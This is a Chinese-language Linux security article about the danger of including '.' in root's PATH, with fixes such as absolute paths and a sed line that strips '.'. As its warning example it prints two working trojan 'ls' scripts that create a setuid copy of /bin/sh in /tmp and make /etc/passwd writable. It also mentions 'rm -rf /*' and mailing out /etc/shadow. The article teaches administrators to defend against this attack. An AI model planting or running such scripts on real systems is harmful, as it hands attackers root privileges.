.是代表當(dāng)前目錄。如果將這點(diǎn)寫入root的環(huán)境變量，執(zhí)行腳本時(shí)，你只需要打腳本的名字，系統(tǒng)就會(huì)在當(dāng)前的目錄下找該腳本并執(zhí)行。

例如，一個(gè)U盤插入電腦，你打了一個(gè)文件名字，系統(tǒng)就會(huì)執(zhí)行U盤中的該文件，如果有木馬程序，也會(huì)被執(zhí)行，比如腳本中有rm -rf /* 這樣的命令，你的系統(tǒng)就會(huì)被刪除。

設(shè)想一下,有一個(gè)人在一個(gè)他能寫的目錄下寫了一個(gè)名為ls的可執(zhí)行程序,程序會(huì)把/etc/shadow文件發(fā)送到某一郵箱,而root又恰巧在那個(gè)目錄下,想ls下,結(jié)果是什么呢?

所以,很多安全要求高的Unix系統(tǒng)甚至要求用絕對(duì)路徑調(diào)用命令

本文主要講述“.”在LINUX的環(huán)境變量PATH中所帶來(lái)的問(wèn)題，及解決的幾種方法。

正如很多人所知道的$PATH環(huán)境變量里存著一張目錄列表，當(dāng)用戶要執(zhí)行某一程序時(shí)，系統(tǒng)就會(huì)按照列表中的內(nèi)容去查找該程序的位置。當(dāng)程序名前不帶點(diǎn)斜線 . / 時(shí)$PATH就會(huì)起作用。

對(duì)于普通用戶和root用戶$PATH里默認(rèn)是不包含"."來(lái)指定用戶的當(dāng)前目錄。這在本機(jī)進(jìn)行腳本開(kāi)發(fā)的程序員來(lái)說(shuō)卻不方便，想圖省事的人就把點(diǎn)加到了搜索路徑中，這就等于在你的系統(tǒng)埋下了險(xiǎn)情。

例如：root為了方便使用在他的當(dāng)前路徑末尾加了個(gè)點(diǎn)"."（搜索目錄為代表當(dāng)前目錄）

命令操作如下：

[root@rh root]# PATH=$PATH:.

[root@rh root]# echo $PATH

/usr/local/sbin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin:.

這下是方便了，直接輸入腳本名就能執(zhí)行。OK，正常情況下一點(diǎn)問(wèn)題沒(méi)有，也省去了輸入./foo.sh的煩惱（foo.sh是我假設(shè)的腳本文件名）。有的root把PATH=$PATH:.這條命令加到了profile里，使所有用戶到分享你給他們帶來(lái)的"福音"。更有勝者root用戶竟然PATH=.:$PATH（將"："加到路徑前是另一種形式）。正常請(qǐng)況下一點(diǎn)問(wèn)題沒(méi)有，直到有一天，張三用戶在他的主目錄下放了名為lls的腳本，并對(duì)root說(shuō)他的系統(tǒng)出問(wèn)題了希望root能幫他解決。（其實(shí)是一個(gè)trap）。Root一上來(lái)就su 成管理員權(quán)限，緊更著列了一下目錄。有可能管理員誤敲成了lls,結(jié)果哈哈。。。。

以下是個(gè)簡(jiǎn)單的C shell 的例子

#!/bin/csh

If ( ! -o /bin/su )

goto finish

cp /bin/sh /tmp/.sh

chmod 7777 /tmp/.sh

finish :

exec /bin/ls $argv | grep -v ls

稍微變形就有個(gè)B shell的

#！/bin/sh

if chmod 666 /etc/passwd > /dev/null 2>&1 ;then

cp /bin/sh /tmp/.sh

chmod 4755 /tmp/.sh

fi

exec ls "$@"

如果root將其環(huán)境變量$PATH包含了"."并且其位置先與ls所在的系統(tǒng)目錄，那么當(dāng)用戶在/tmp中執(zhí)行l(wèi)s時(shí)，執(zhí)行的是上面給出的腳本，而不是實(shí)際的ls命令，因?yàn)樽罱K還是執(zhí)行了ls,所以root不會(huì)看出有任何異常。如果是root執(zhí)行了該腳本，就會(huì)將口令文件設(shè)置為可寫,并將shell復(fù)制到/tmp保存為.sh，同時(shí)設(shè)置其setuserid位，所有這一切都非常安靜地發(fā)生。

在以上這兩個(gè)程序里，心懷不鬼的人能寫入任何令root急的要跳樓的程序，部下陷阱等root來(lái)鉆，也許root在不知不覺(jué)中施行了也根本不會(huì)察覺(jué)。 也許在張三的主目錄下有一個(gè)名為ps的腳本里面包含有危險(xiǎn)腳本，root可能一到他的機(jī)器前就輸入了ps,此時(shí)系統(tǒng)會(huì)首先到當(dāng)前目錄下搜索，結(jié)果/sbin/ps卻不被執(zhí)行。類似這樣的小花招還有很多。

管理員同志，不要太緊張，下面我說(shuō)說(shuō)解決辦法。

首先，要養(yǎng)成輸絕對(duì)路徑的良好命令行輸入習(xí)慣，這樣就不會(huì)讓"不法份子"乘虛而入了。比如，列目錄最好用/bin/ls來(lái)列目錄，不要圖方便而冒然輸入ls。

其次，根用戶（root）不要把"."包括到搜索目錄列表里，而普通用戶如果個(gè)"."包括到搜索列表中的話別，則"."就應(yīng)當(dāng)放在搜索目錄列表的最后位置上。這樣一來(lái)普通用戶不會(huì)受到前面所述的那種危害。

最后，可以在登陸時(shí)在/etc/profile 和bashrc .profile文件的末尾添加如下一行

[PATH=`echo $PATH |sed -e 's/::/:/g; s/:.:/:/g; s/:.$//; s/^://' `

這個(gè)簡(jiǎn)單的sed命令將刪除路徑里所有的"."包括其另一形式"：："

還可以由crontab調(diào)用定期執(zhí)行

#find / ! -fstype proc '(' -name '.??*' -o -name '.[^.]' ')' > point.txt ; mail -s 'this is a pointlist' root@localhost < point.txt

來(lái)搜索所有以點(diǎn)開(kāi)頭的文件，再發(fā)送到root的郵箱里,再進(jìn)行比較等任務(wù)。